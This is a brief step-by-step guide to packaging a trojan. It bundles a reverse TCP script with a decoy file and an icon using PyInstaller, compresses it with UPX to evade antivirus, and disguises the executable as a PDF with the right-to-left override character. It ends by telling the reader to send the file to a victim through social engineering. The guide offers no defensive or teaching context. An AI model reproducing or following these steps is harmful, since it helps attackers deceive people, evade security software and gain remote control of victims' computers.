Packaging Trojans with any file

Using App Data

Steps

• Install Pyinstaller
• Downloading Icon :
• Download Icon from IconFinder
• set filters to free and choose high resolution.
• download icon
• Changing downloaded png to ico
• Visit ICO convert or OnlineConvert.com
• Upload image
• choose desired settings
• convert and download ico file

• If using requests use 2.5.1

  pyinstaller --add-data "path_to_front_file;." --icon "full_icon_path" --one-file --noconsole -n "name_of_output_file" "path_to_reverse_tcp.py"
  

Bypassing AV using UPX

• Download UPX
• Extract files
• Use UPX to compress pyinstaller generated executable

• Syntax:

  ./upx "full_path_of_executable" -o "full_path_of_compressed_executable"
  

Spoofing File Type

• Copy Right to left override character (U+202E). copy from below or from unicode-explorer website

‮ 

• file_name-(type_everything_in_reverse_order) and paste copied character after -.

• eg : sample_pdf-fdp.exe

  • file_name : sample_pdf
  • spoofing_extension : pdf
  • reverse order of spoofing extension : fdp
  • file_extension : exe

• spoofed file_name : sample_pdf-‮fdp.exe

• Search words ending with exe (if windows executable) and remove - to make trojan to look like a real file.

• word ending with exe : alexe
• spoofed file_name : spoofed_alexe.pdf
• actual file_name : spoofed_alfdp.exe

Send File to victim

• Send file to victim through using attacks or social engineering.